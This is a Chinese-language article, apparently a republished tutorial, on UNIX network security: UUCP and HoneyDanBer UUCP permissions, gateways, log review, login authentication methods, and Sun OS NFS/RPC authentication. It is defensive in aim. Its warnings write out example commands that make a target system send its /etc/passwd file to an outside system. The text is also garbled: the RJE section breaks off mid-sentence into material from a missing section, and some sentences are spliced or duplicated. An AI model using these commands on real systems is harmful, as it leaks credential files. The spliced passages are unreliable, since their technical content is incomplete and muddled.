網絡安全

    本文主要討論網絡和數據通訊安全,分為六個部分.第一部分概述最大,最老的UNIX網絡UUCP系統;第二部分討論UUCP的安全;第三部分討論新HONEY DANBER UUCP及安全特點;第四部分討論其它的UNIX網絡,其中包括RJE和NSC;第五部分討論通訊的物理安全;最后一部分討論Sun Microsystem公司的Sun OS系統的網絡安全.

1.UUCP系統概述
    UUCP系統是一組程序,完成文件傳輸,執行系統之間的命令,維護系統使用情況的統計,保護安全.UUCP是UNIX系統最廣泛使用的網絡實用系統,這其中在兩個原因:第一,UUCP是各種UNIX版本都可用的唯一的標準網絡系統,第二,UUCP是最便宜的網絡系統.只需要一根電纜連接兩個系統,然后就可建立UUCP.如果需要在相距數百或數千公里遠的兩個系統間傳輸數據,中需要兩個具有撥號功能的調制解調器.

(1)UUCP命令
    UUCP命令之一是uucp,該命令用于兩系統間的文件傳輸,uucp命令格式類似于cp命令的格式,只是uucp允許用戶有系統間拷貝文件,命令的一般格式如下:
uucp source_file destination_file
    source_file通常是本系統的文件(但不必一定是),destination_file通常是另一系統的文件或目錄.指定destination_file的格式為:
system!filename或system!directory.
    uucp給系統管理員提供了一個選項,可以限制傳入和傳出本系統的uucp文件只能傳到/usr/spool/uucppublic目錄結構中.若告訴uucp將傳輸的文件存放在其他目錄中,系統將會送回一個郵件:remote aclearcase/" target="_blank" >ccess to path / file denied. uucp允許以簡化符號~代替/usr/spool/uucppublic/.如:uucp names remote!~/john/names
    有時也可用uucp將文件從另一個系統拷貝到本系統,只要將要傳入本系統的文件指定為源文件(用system!file)即可,如:
uucp remotes!/usr/john/file1 file1
    如果在遠地機限制了文件傳輸的目錄,上條命令不能拷貝到文件.拷貝文到本系統的最安全的方法是:在兩個系統上都通過uucppublic目錄進行文件傳輸:
uucp remotes!~/john/file1 ~/pat/file1

(2)uux命令
    uux命令可用于在另一個系統上執行命令,這一特點稱為"遠程命令仞行".uux最通常的用處是在系統之間發送郵件(mail在其內部執行uux).典型的uux請求如下:
pr listing| uux - "remote1!lp -d pr1"
    這條命令將文件listing格式編排后,再連接到系統remote1的打印機pr1上打印出來.uux的選項"-"使uux將本命令的標準輸入設備建立為遠程命令的標準輸入設備.當若干個系統中只有一個系統連接了打印機時,常用uux打印文件.
當然必須嚴格地限制遠程命令招待,以保護系統安全.如:本系統不應允許其它系統上的用戶運行下面的命令:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
    這條命令將使本系統傳送/etc/passwd文件到系統outside上,一般地,只有幾條命令允許地執行.rmail是加限制的mail程序,常常為允許通過uux執行的命令之一.也允許rnews(加限制的netnews偽脫機命令)在運行netnews的系統上執行,還允許lp在提供了打印設備的系統上運行.

(3)uucico程序
    uucp和uux命令實際上并不調用另一個系統及傳送文件和執行命令,而是將用戶的請求排入隊列,并啟動uucico程序.uucico完成實際的通訊工作.它調用其它的系統,登錄,傳送數據(可以是文件或請求遠程命令執行).如果電話線忙,或其它系統已關機,傳輸請求仍針保留在隊列中,uucico后續的職能操作(通常是cron完成)將發送這些傳輸請求.
    uucico完成數據的發送和接收.在本系統的/etc/passwd文件中,有其它系統的uucico登錄進入本系統的入口項,該入口項中指定的缺省shell是uucico.因此,其它系統調用本系統時,直接與uucico對話.

(4)uuxqt程序
   當另一系統的uucico調用本系統請求遠程命令執行時,本系統的uucico將該請求排入隊列,并在退出之前,啟動uuxqt程序執行遠程命令請求.
   下面舉例說明數據是如何傳輸的.假設本系統的一個用戶發送郵件給另一遠程系統remote1的某人,mail會執行uux,在remote1系統上遠程地運行remail程序,要傳送的郵件為remail命令的輸入.uux將傳輸請求排入隊列,然后啟動uucico招待實際的遠程調用和數據傳輸.如果remote1響應請求,uucico登錄到remote1,然后傳送兩個文件:郵件和將在remote1上由uuxqt執行的uux命令文件.uux命令文件中含有運行remail請求.如果remote1在被調時已關機,uucico則將無法登和傳送文件,但是cron會周期地(1小時)啟動uucico.uucico查找是否有還未傳送出的數據,若發現uux指定的傳輸目標系統是remote1,就嘗試再調用remote1,直到調通remote1為止,或者過了一定天數仍未調通remote1,未送出的郵件將作為"不可投遞"的郵件退回給發送該郵件的用戶.

2.UUCP的安全問題
    UUCP系統未設置限制,允許任何本系統外的用戶執行任何命令和拷貝進/出uucp用戶可讀/寫的任何文件.在具體的uucp應用環境中應了解這點,根據需要設置保護.
    在UUCP中,有兩個程序處理安全問題.第一個是uucico程序,該程序在其它系統調用本系統時啟動.這個程序是本系統uucp安全的關鍵,完成本系統文件傳輸的傳進和傳出.第二個程序是uuxqt,該程序為所有的遠程命令執行服務.

(1)USERFILE文件
    uucico用文件/usr/lib/uucp/USERFILE確定遠程系統發送或接收什么文件,其格式為:
login,sys[c] path_name [path_name...]
    其中login是本系統的登錄名,sys是遠程系統名,c是可選的call_back標志,path_name是目錄名.
    uucico作為登錄shell啟動時,將得到遠程系統名和所在系統的登錄名,并在USERFILE文件中找到匹配login和sys的行.如果該行含有call_back標志c,uucico將不傳送文件,連接斷開,調用遠程系統(即,任何系統可以告訴本系統它的名是xyz,于是本系統掛起,調用實際的xyz執行文件傳輸),若無c,uucico將執行遠程系統請求的文件傳送,被傳送的文件名被假定為以path_name開頭的.
用戶需要了解以下幾點:
. 如果遠程系統使用的登錄名未列于USERFILE的登錄域中,uucico將拒絕允許其它系統做任何事,并掛起.
. 如果系統名未列于sys域中,uucico將使用USERFILE中有匹配的登錄名和空系統名的第一行,如:nuucp,/usr/spool/uucppublic應用到作為nuucp登錄的所有系統.cbuucp,c將迫使作為cbuucp登錄的所有系統自己執行文件傳輸的請求.若調用系統名不匹配sys系統中的任何一個,并且無空入口項,uucico也將拒絕做任何事.
. 若兩個機器都設置了call_back標志,傳送文件的請求決不會被執行,兩個系統一直互相調用,直到兩個系統中的一個取消call_back時,才能進行文件傳送.
. 如果一個用戶的登錄名列于USERFILE文件的login域中,則當調用本系統的uucico為該用戶傳送文件時,uucico只傳送至path_name指定的目錄中的文件.空登錄名用于所有未明確列于USERFILE文件中的用戶進行登錄.所以pat,/usr/pat只允許pat傳送/usr/pat目錄結構中的文件.
,/usr/spool/uucppublic /tmp
其他用戶僅允許傳送目錄/usr/spool/uucppublic和/tmp中的文件.不要允許uucico將文件拷進/出到除了/usr/spool/uucppublic目錄以外的其它任何目錄,否則可能會有人用下面的命令拷貝走本系統的重要
信息:
uucp yoursys!/etc/passwd to-creep

(2)L.cmds文件
    uuxqt利用/usr/lib/uucp/L.cmds文件確定要執行的遠程執行請求命令.該文件的格式是每行一條命令.如果只需uuxqt處理電子郵件,該文件中就只須一行命令:
rmail
    系統管理員可允許登錄用戶執行netnews(rnews)的命令或遠程打印命令(lp),但決不能允許用戶執行拷貝文件到標準輸出的命令,如cat命令或網絡命令uucp,否則這些人只需在他們自己的系統上敲入:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
然后就可等待本系統發送出命令文件.

(3)uucp登錄
    UUCP系統需要兩個登錄戶頭,一個是其它系統登錄的戶頭,另一個是系統管理使用的戶頭.例如,數據傳輸登錄戶頭是nuucp,管理登錄戶頭是uucp,則在/etc/passwd文件中應當有二行.
    UID和GID的5號通常留給uucp,由于uucico具有管理登錄的SUID許可,因此nuucp戶頭的UID和GID應當用其它值.

(4)uucp使用的文件和目錄
    /usr/lib/uucp用于存放不能由用戶直接運行的各種uucp,如uuxqt和uucico.該目錄還含有若干個確定uucp如何操作的文件,如L.cmds和USERFILE.這些文件只能對uucp管理戶頭可寫(系統管理員一定不愿讓用戶更改遠程可執行命令表):根據安全的觀點,該目錄中另一個系統管理員必須清楚的文件是L.sys.該文件中含有uucico能調用的每個系統的入口項.入口項數據包括uucico所調用系統的電話號碼,登錄名,未加密的口令.不用說,L.sys應當屬于uucp管理戶頭所有,且應當具有400或600存取許可.
    uucp用/usr/spool/uucp目錄存放工作文件.文件名以C.開頭的文件是送到其它系統的命令文件,含有在其它系統上拷入/出數據和執行命令的請求.文件名以D.開頭的文件用作C.文件的數據文件.文件名以X.開頭的文件是來自其它系統的遠程執行請求,由uuxqt解釋.文件名以TM.開始的文件是從其它系統傳送數據到本系統過程中uucp所使用的暫存文件.XQTDIR是uuxqt用于執行X.文件的目錄.LOGFILE可有助于管理uucp的安全,它含有執行uucp請求成功與否的信息.系統管理員可時常查看該文件,了解有哪些系統正登錄入本系統執行uucp請求?是什么請求?特別要檢查這些請求是否試圖做不允許的操作.

3.HONEYDANBER UUCP
    有兩個主要的UUCP版本,第一個是與UNIX系統V一起頒布的,在本節將稱為老UUCP,另一個版本稱為HONEYDANBER UUCP,由AT&T頒布.HONEYDANBER UUCP較之老UUCP有若干改進:
<1>支持更多的撥號和網絡:
. 智能自動撥號調制解調器以及標準AT&T技術的801自動撥號器.
. 網絡,如DATAKIT VCS,UNET/ETHERNET, 3COM/ETHERNET, SYTEK, TCP(BSD UNIX系統).
. 連接到LAN的撥號器.
. X.25永久性虛擬環網(用X.25協議)
<2>重新組織了/usr/spool/uucp目錄,在該目錄下,對每個遠程系統有一個目錄.
<3>加強了安全.
. USERFILE和L.cmds文件組合成一個文件Permissions.
. 可以在一級級系統上指定遠程可執行命令.
. 可分別控制文件傳入和文件傳出.
. 缺省的安全設置很嚴格.

(1)HONEYDANBER UUCP與老UUCP的差別
    HONEYDANBER UUCP中的/usr/lib/uucp/Systems文件是原來UUCP中的/usr/lib/uucp/L.sys.HONEYDANBER UUCP中/usr/spool/uucp/.log下的一個目錄代替了老UUCP的文件/usr/spool/uucp/logFILE./usr/spool/uucp/.log中的目錄uucico,uucp,uux,uuxqt含有相應命令的記錄文件,各目錄對應最近處于活躍狀態的遠程系統都有一個記錄文件(記錄文件在這些目錄中通常保存一個星期).
    如果一個調用本系統的遠程系統未列于Systems文件中,uucico將不允許該遠程系統執行任何操作,而是啟動shell程序/usr/lib/uucp/remote.unknown,由UUCP提供的該shell程序的缺省版本將在/usr/spool/uucp/.Admin/Foreign文件中記下遠程系統的登錄時間,日期及系統名.只要使remote.unknown不可執行,就能禁止這一操作,以達到與老UUCP兼容.
    C.,D.,X.,TM.等文件存放在/usr/spool/uucp下的不同目錄中,目錄名就是文件對應的遠程系統名.
    在HONEYDANBER UUCP中USERFILE與L.cmds文件合并在一起,這個新文件/usr/lib/uucp/Permissions提供了更靈活的授予外系統存取許可的控制.文件中的規則表定義了可以發出請示的各種系統.規則與選項的格式如下.
rule=list option=yes|no option=list...
    其中rule是登錄名或機器名,list是用以分隔各項的規則表(表中各項隨rule或option而變),option是下邊將討論的各選項之一,或為一個選項表,或只取yes/no決定允許/不允許一項操作.

(2)登錄名規則
LOGNAME規則用于控制作為登錄shell啟動的uucico.
LOGNAME=nuucp
指定對所有登錄到nuucp戶頭下的系統加缺省限制:
. 遠程系統只能發送文件到/usr/spool/uucppublic目錄中.
. 遠程系統不能請求接收任何文件.
. 當uucico調用遠程系統時,才發送已排入隊列要發送到該遠程系統的文件.這是uucico準確地識別遠程系統的唯一方法(任何系統都可調用本系統并冒充是xyz系統).
. 由uuxqtux遠程系統的名義可執行的命令是缺省規定的命令,這些缺省命令在編譯時定義(通常只有rmail,rnews命令).
. 可用冒號分隔開若干個其它系統的uucico的登錄戶頭.
LOGNAME=nuucp:xuucp:yuucp
任何設有LOGNAME規則的系統,若要登錄請求UUCP傳送,都會被回絕(系統將給信息"get lost",并掛起).
    一個LOGNAME規則就足夠啟動HONEYDANBER UUCP系統.事實上,當該系統運行時,將在Permissions文件中放一個無選項的LOGNAME規則,該規則應用于在/etc/passwd文件入口項shell域中有/usr/lib/uucp/uucico的所有登錄戶頭.可使用若干選擇忽略缺省限制,這些選項可組合,允許或限制各種操作.例如可用WRITE選項指定一個或多個送入文件的目錄,而不用被限制送入/usr/spool/uucppublic目錄.
LOGNAME=nuucp WRITE=/
這一規則允許文件送入本系統的任何目錄.2-4項的限制依然保持.注意:遠程UUCP請求可重寫任何有寫許可的文件,可指定多個寫入文件的目錄.用冒號分隔開:
LOGNAME=nnuucp WRITE=/usr:/floppy
該規則允許遠程系統將文件寫到/usr和/floppy目錄中.用REQUEST=yes選項可允許遠程系統的用戶從本系統拷貝文件.
LOGNAME=nuucp REQUEST=yes
能被拷貝的文件只能是存放在/usr/spool/uucppublic目錄中的文件,1,3,4,項的限制仍然有效.若要允許遠程系統可從其它目錄拷貝文件,用READ選擇:
LOGNAME=nuucp REQUEST=yes READ=/usr
該規則允許遠程系統拷貝/usr目錄中任何其他人可讀的文件.也可像WRITE選項一樣指定目錄表.
用SENDFILES=yes選項可允許uucico在遠程系統調用本系統時發送出已排隊的文件.
LOGNAME=nuucp SENDFILES=yes
1,2,4項的限制依然有效.
用CALLBACK=yes選項迫使任何登錄到指定戶頭的系統call back.
    注意:CALLBACK=yes不能與其它選項組合作用.如果其它選項與這條選項列在一起,其它選項將被忽略.
    NOREAD和NOWRITE選項可分別與READ和WRITE選項一起使用.指定NOREAD選項下的目錄表,可建立對READ選項的例外處理(即指出READ目錄中不能由遠程系統請求的目錄),例如:
LOGNAME=nuucp,REQUEST=yes READ=/ NOREAD=/etc
    該規則允許遠程系統請求系統中任何其他人可讀的文件,但不包括/etc中的文件,NOWRITE,WRITE的聯合用法與上類似.
    一般來說,不要將缺省限制改得太多.若本系統被另一系統調去存貯電話費用或系統管理員沒有辦法撥出,可以用SENDFILE選項.若要對某些機器取消限制,則應當建立一個僅用于那些機器的uucico登錄戶頭.例如:
LOGNAME=nuucp SENDFILES=yes
LOGNAME=trusted SENDFILES=yes REQUEST=yes READ=/ WRITE=/
    上面的規則允許在trusted戶頭下登錄的系統在本系統中具有另一種文件存取許可,nuucp戶頭的口令應送給所有要與本系統uucp建立連接的系統管理員,trusted戶頭的口令則只能送給信任系統的管理員.
    如系統有信任和非信任的uucp戶頭,最好用PUBDIR選項為這兩種戶頭建立不同的公共戶頭,PUBDIR允許系統管理員改變uucico對公共目錄的概念(缺省為/usr/spool/uucppublic).例如:
LOGNAME=nuucp SENDFILES=yes REQUEST=yes
PUBDIR=/usr/spool/uucppublic/nuucp
LOGNAME=trusted SENDFILES=yes REQUEST=yes READ=/ WRITE=/
PUBDIR=/usr/spool/uucppublic/trusted
    上面的選項使要送到公共目錄中的文件,對于不同登錄nuucp和trusted分別放入不同的目錄中.這將防止登錄到nuucp的非信任系統在信任系統的公共目錄中拷進和拷出文件(注意:上面的選項允許nuucp請求文件傳送).行尾倒斜杠指明下一行是該行的續行.
用MYNAME選項可以給登錄進某一戶頭的系統賦與一個系統名:
LOGNAME=Xuucp MYNAME=IOnker

(3)MACHINE規則
    MACHINE規則用于忽略缺省限制,在MACHINE規則中指定一個系統名表,就可使uucico調用這些系統時改變缺省限制.READ,WRITE,REQUEST,NOREAD,NOWRITE,PUBDIR選項的功能與LOGNAME相同.忽略CALLBACK,SENDFILES選項,MYNAME選項所定義的必須與LOGNAME規則聯用,指定將賦給調用系統的名,該名僅當調用所定義的系統時才用.
MACHINE規則的格式如下:
MACHINE=zuul:gozur:enigma WRITE=/ READ=/
    這條規則使遠程系統zuul,gozar,enigma能夠發送/請求本系統上任何其他人可讀/寫的文件.一般不要讓遠程系統在除/usr/spool/uucppublic目錄外的其它目錄讀寫文件,因此,對于信任的系統也要少用MACHINE規則.系統名OTHER用于為指定用戶外的所有其他用戶建立MACHINE規則.COMMANDS選項用于改變uuxqt通過遠程請求執行的缺省命令表.
MACHINE=zuul COMMANDS=rmail:rnews:lp
    上面的選項允許系統zuul請求遠程執行命令rmail,rnews,lp.uucico不用這個選項.uuxqt用該選項確定以什么系統的名義執行什么命令.COMMANDS選項所指定的命令將用缺省設置的路徑PATH.PATH在編輯uuxqt時被建立通常設置為/bin:/usr/bin.在COMMANDS選項中給出全路徑名可以忽略缺省PATH.
MACHINE=zuul COMMANDS=umail:/usr/local/bin/rnews:lp
    同樣地,對HONEYDANBER UUCP也應當象老UUCP一樣不允許遠程系統運行uucp或cat這樣的命令.任何能讀寫文件的遠程執行命令都可能威脅局域安全.雖然局域系統對遠程系統名進行一定程序的校核,但是任何遠程系統在調用局域系統時都可自稱是"xyz",而局域系統卻完全相信是真的.因此局域系統的系統可能認為只允許了zuul運行lp命令.但實際上任何自稱是zuul的系統也被允許運行lp命令.
    有兩種方法可以證實系統的身份.一種方法是拒絕用CALLBACK=yes與調用系統對話.只要電話和網絡線未被破密或改變,局域系統就能肯定地確認遠程系統的身份.另一種方法是在LOGNAME規則中用VALIDATE選項.若必須允許某些系統運行"危險"的命令,可聯用COMMANDS和VALIDATE選項,VALIDATE選項用于LOGNAME規則中指定某系統必須登錄到LOGNAME規定的登錄戶頭下:
LOGNAME=trusted VALIDATE=zuul
MACHINE=COMMANDS=rmail:rnews:lp
     當一個遠程系統自稱是zuul登錄時,uucico將查Permissions文件,找到LOGNAME=trusted規則中的VALIDATE=zuul,若該遠程系統使用了登錄戶頭trusted,uucico將認為該系統的確是zuul繼續往下執行,否則uucico將認為該系統是假冒者,拒絕執行其請求.只要唯有zuul有trusted戶頭的登錄口令,其它系統就不能假冒它.僅當登錄口令是保密的,沒有公布給其他非信任的系統管理員或不安全的系統,VALIDATE選項才能奏效.如果信任系統的登錄口令泄漏了,則任何系統都可偽裝為信任系統.
    在COMMANDS選項中給出ALL時,將允許通過遠程請求執行任何命令.因此,不要使用ALL!規定ALL實際上就是把自己的戶頭給了遠程系統上的每一個用戶.

(4)組合MACHINE和LOGNAME規則
    將MACHINE和LOGNAME規則組合在一行中,可以確保一組系統的統一安全,而不管遠程系統調用局域系統還是局域系統調用遠程系統.
LOGNAME=trusted MACHINE=zuul:gozur VALIDATE=zuul:gozur
REQUEST=yes SENDFILES=yes
READ=/ WRITE=/ PUBDIR=/usr/spool/trusted
COMMANDS=rmail:rnews:lp:daps

(5)uucheck命令
    一旦建立了Permissions文件,可用uucheck -v命令了解uucp如何解釋該文件.其輸出的前幾行是確認HONEYDANBER UUCP使用的所有文件,目錄,命令都存在,然后是對Permissions文件的檢查.

(6)網關(gateway)
    郵件轉送可用于建立一個gateway機器.gateway是一個只轉送郵件給其它系統的系統.有了gateway,使有許多UNIX系統的部門或公司對其所有用戶只設一個電子郵件地址.所有發來的郵件都通過gateway轉送到相應的機器.
    gateway也可用于加強安全:可將MODEM連接到gateway上,由gateway轉送郵件的所有系統通過局域網或有線通訊線與gateway通訊.所有這些局域系統的電話號碼,uucp登錄戶頭,口令不能對該組局域系統外的系統公布.如果有必要,可使gateway是唯一連接了MODEM的系統.
    建立一個最簡單的gateway是很容易的:對每個登錄進系統,想得到轉送郵件的用戶,只需在文件/usr/mail/login中放入一行:
Forward to system !login
    要發送給戶頭login的郵件進入gateway后,將轉送給登錄在系統system的戶頭login下的用戶.兩個登錄名可以不同.
    gateway建立了一個安全管理的關卡:gateway的口令必須是不可猜測的,gateway應盡可能只轉送郵送而不做別的事.至少不要將重要數據存放在該機上.在gateway上還應做日常例行安全檢查,并且要對uucp的登錄進行仔細的檢查.
    gateway也為壞家伙提供了一個入口:如果有人非法進入了gateway,他將通過uucp使用的通訊線存取其它的局域系統和存取含有關于其它局域系統uucp信息的Systems文件.若這人企圖非法進入其它系統,這些信息將對他具有很大的用處.
經驗:
. 若要建立gateway,應確保其盡可能的無懈可擊.
. 可在gateway和局域系統間建立uucp連接,使得局域系統定期的與gateway通訊獲取郵件,而gateway完全不用調用局域系統.這樣做至少能防止一個壞家伙通過gateway非法進入局域系統.
. 利用局域系統的Permissions文件對gateway的行為加以限制,使其裸露程度達到最小,即只轉發郵件.這樣可使竊密者不能利用gateway獲取其它系統的文件.

(7)登錄文件檢查
    HONEYDANBER UUCP自動地將登錄信息郵給uucp.login文件,應當定期地讀這個文件.系統管理員應當檢查那些不成功的大量請求,特別是其它系統對本系統的文件請求.還要檢查不允許做的遠程命令執行請求.登錄信息都保存在文件中,如果要查看,可用grep命令查看./usr/spool/uucp/.Log/uucico/system文件中含有uucico登錄,/usr/spool/uucp/.Log/uuxqt/system文件含有uuxqt登錄.下面一行命令將打印出uuxqt執行的所有命令(rmail除外):grep -v rmail /usr/spool/uucp/.Log/uuxqt/*
下面一行命令將打印所有對本系統文件的遠程請求:
grep -v REMOTE /usr/spool/uucp/.Log/uucico/* | grep "<"
    總之,HONEYDANBER UUCP比老UUCP提供了更強的安全性,特別是提高了遠程命令執行的安全性.

4.其它網絡

(1)遠程作業登錄(RJE)
    RJE(remote job entry)系統提供了一組程序及相應的硬件,允許UNIX系統與IBM主機上的JES(job entry subsystems)通訊.可通過兩條命令的send和usend存取RJE.send命令是RJE的通用的作業提供程序,它將提供文件給J 碼存于MODEM中的人才是系統的用戶,從而使非法侵入者不能從其家里調用系統并登錄,這一方法的缺點是限制了用戶的靈活性,并仍需要使用口令,因為MODEM不能僅從用戶發出調用的地方,唯一地標識用戶.
. 標記識別:標記是口令的物理實現,許多標記識別系統使用某種形式的卡(如背面有磁條的信用卡),這種卡含有一個編碼后的隨機數.卡由連接到終端的閱卡機讀入,不用再敲入口令.為了增加安全性,有的系統要求讀入卡和敲入口令.有些卡的編碼方法使得編碼難于復制.標記識別的優點是,標識可以是隨機的并且必須長于口令.不足之處是每個用戶必須攜帶一個卡(卡也可與公司的徽記組合使用).并且每個終端上必須連接一個閱讀機.
. 一次性口令:即"詢問-應答系統".一次性口令系統允許用戶每次登錄時使用不同的口令.這種系統允許用戶每次登錄時使用不同的口令.這種系統使用一種稱做口令發生器的設備,設備是手攜式的(大約為一個袖珍計算器的大小),并有一個加密程序和獨一的內部加密關鍵詞.系統在用戶登錄時給用戶提供一個隨機數,用戶將這個隨機數送入口令發生器,口令發生器用用戶的關鍵詞對隨機數加密,然后用戶再將口令發生器輸出的加密口令(回答)送入系統,系統將用戶輸入的口令,與它用相同的加密程序,關鍵詞和隨機數產生的口令比較,如果二者相同,允許用戶存取系統.這種方法的優點是:用戶可每次敲入不同的口令,因此不需要口令保密,唯有口令發生器需要安全保護.為了增加安全性,UNIX系統甚至不需聯機保存關鍵詞,實際的關鍵詞可保存在有線連接于系統的一個特殊加密計算機中.在用戶登錄期間,加密計算機將為用戶產生隨機數和加密口令.這樣一種系統的優點是,口令實際不由用戶輸入,系統中也不保存關鍵詞,即使是加密格式的關鍵詞也可保存于系統中.其不足之處類似于標記識別方法,每個用戶必須攜帶口令發生器,如果要脫機保存關鍵詞,還需要有一個特殊硬件.
. 個人特征:有些識別系統檢測如指印,簽名,聲音,零售圖案這倦的物理特征.大多數這樣的系統極是實驗性的,昂貴的,并且不是百分之百的可靠.任何一個送數據到遠程系統去核實的系統有被搭線竊聽的危險,非法入侵者只須記錄下送去系統校核的信息,以后再重顯示這些信息,就能竊密.注意:這同樣也是標記識別系統的一個問題.

6.SUN OS系統的網絡安全
    美國SUN MICROSYSTEM公司的SUN OS操作系統是建立在貝爾實驗室的UNIX SYSTEM V和加州大學伯克得分校的UNIX 4.3基礎上的UNIX操作系統.SUN OS 4.0版提供了專門的鑒別系統,該系統極大地提高了網絡環境的安全性.它也可用來確保其它UNIX系統或非UNIX系統的安全.它使用DES密碼機構和公共關鍵字密碼機構來鑒別在網絡中的用戶和機器.DES表示數據編碼標準,而公共數據編碼機構是包含兩種密鑰的密碼系統:一種是公用的,另一種是專用的.公用的密鑰是公開的而專用密鑰是不公開的.專用(秘密)的密鑰用來對數據進行編碼和解碼.SUN OS系統不同于其它公共關鍵字編碼之系統在于:SUN OS的公用和專用密鑰都被用來生成一個通用密鑰,該密鑰又用來產生DES密鑰.

(1)確保NFS的安全
    在網絡文件系統NFS上建立安全系統,首先文件系統必須開放并保證裝配的安全.
. 編輯/etc/exports文件,并將-Secure任選項加在要使用DES編碼機構的文件系統上.在屏幕上顯示服務器怎樣開放安全的/home目錄,如:home -Secure,access=engineering其中engineering是網絡中唯一能存取/home文件系統的用戶組.
. 對于每臺客戶機(CLIENT),編輯/etc/fastab文件時,Secure將作為一個裝配任選項出現在每個需要確保安全的文件系統中.
. SUN OS中包括有/etc/publickey數據庫,該庫對每個用戶均包含有三個域:用戶的網絡名,公用密鑰和編碼后的密鑰.當正常安裝時X唯一的用戶是nobody,這個用戶可以無需管理員的干預即可建立自己的專用密鑰(使用chkey(1)).為了進一步確保安全,管理員可為每個使用newkey(8)的用戶建立一個公用密鑰.
. 確認keyserv(8c)進程由/etc/rc.local啟動,并且仍在運行.該進程執行對公用密碼的編碼,并將編碼后的專用密鑰存入/etc/keystore中.
. 此時,所有的用戶(除超級用戶)都必須使用yppasswd來代替passwd,以使得登錄的口令與用戶的密鑰一致.其結果是在網絡中每臺客戶機的
/etc/passwd文件中不能有每個用戶的用戶名,因而應使用有缺省值的
/etc/passwd文件.
. 當安裝,移動或升級某臺機器時,要將/etc/keystore和/etc/.rootkey兩個文件保留.
    注意:當你使用login,rlogin或telnet命令到遠程機器時,你會被要求輸入口令.一旦你輸入正確的口令,你也就泄漏了你的帳號.因為此時你的密鑰是存放在/etc/keystore中.當然這是指用戶對遠程機器的安全不信任時.如果用戶覺得遠程機器在安全保密方面不可靠,那就不要登錄到遠程機器去,而可使用NFS來裝配你所查找的文件.

(2)NFS安全性方面的缺陷
    SUN的遠程過程調用(RPC)機制已被證明可以用來建立有效的網絡服務,最有名的服務是NFS,它實現了不同機器,不同操作系統之間透明的文件共享.但NFS并非毫無缺陷.通常NFS鑒別一個寫文件的請求時是鑒別發出這個請求的機器,而不是用戶.因而,在基于NFS的文件系統中,運行su命令而成為某個文件的擁有者并不是一件困難的事情.同樣,rlogin命令使用的是與NFS同樣的鑒別機制,也存在與NFS一樣的在安全性方面的弱點.
    對網絡安全問題一個通常的辦法是針對每一個具體的應用來進行解決.而更好的辦法是在RPC層設置鑒別機構,使對所有的基于RPC的應用都使用標準的鑒別機構(比如NFS和Yellow pages).于是在SUN OS系統中就可以對用戶的機器都進行鑒別.這樣做的優點是使計算機網絡系統更像過去的分時系統.在每臺機器上的用戶都可登錄到任何一臺機器;就象分時系統中任何一個終端上的用戶都可登錄到主機系統一樣,用戶的登錄口令就是網絡的安全保證.用戶不需要有任何有關鑒別系統的基礎.SUN系統的目標是讓網絡系統成為既安全又方便的分時系統.
要注意以下幾點:
. 任何人只要他擁有root存取權并具備較好的網絡程序設計知識,他就可以向網絡中加入二進制數據或從網絡中獲得數據.
. 在采用以太網結構的局域網的工作中不可能發生信息包被竄改(即被傳送的信息包在到達目的站之前,被捕獲并將其修改后按原路徑發出),因為所有的信息包都將幾乎同時到達目的站之前,被捕獲并將其修改后按原路徑發出),但在網關上發生包被竄改則是有可能的.因而應確保網絡中所有網關都是可靠的.
. 對網絡系統最危險的攻擊是同向網絡中加入數據有關的事件,例如通過生成一個合法的信息包來冒充某個用戶;或記錄下用戶會話的內容,并在晚一些時候再回答它們.這些都會嚴重的影響數據的完整性.
. 至于偷看信息這類侵襲(僅僅是偷看網絡中傳送的內容而不冒充任何人)將可能造成失密,但并不十分危險,因為數據的完整性沒有被破壞,而且用戶可通過對需要保密的數據進行編碼來保護數據的專用.
    總之,在任何意義上要完全明白網絡傳送的各種問題并不是很容易的,需不斷實踐分析.

(3)遠程過程調用(RPC)鑒別
    RPC是網絡安全的核心,要明白這一點就必須清楚在RPC中鑒別機制是怎樣工作的.RPC的鑒別機制是端口開放式的,即各種鑒別系統都可插入其中并與之共存.當前SUN OS有兩個鑒別系統:UNIX和DES,前者是老的,功能也弱.后者是在本節要介紹的新系統.對于RPC鑒別機制有兩個詞是很重要的:證書和核對器(credentials和verify).這好比身份證一樣,證書是識別一個人的姓名,地址,出生日期等;而核對器就是身份證的照片,通過這張照片就能對持有者進行核對.在RPC機制中也是這樣:客戶進程在RPC請求時要發出證書和核對器信息.而服務器收到后只返回核對器信息,因為客戶是已知道服務的證書的.

(4)UNIX鑒別機制
    SUN早期的各種網絡服務都建立在UNIX鑒別機制之上,證書部分包含站名,用戶號,組號和同組存取序列,而核對器是空白.這個系統存在兩個問題:首先,最突出的問題是核對器是空的,這就使得偽造一份證書是非常容易的.如果網絡中所有的系統管理員都是可以信賴的,那不會有什么問題.但是在許多網絡(特別是在大學)中,這樣是不安全的.而NFS對通過查尋發出mount請求的工作站的INTERNET地址作為hostname域的核對器來彌補UNIX鑒別.

原文轉自：http://www.kjueaiud.com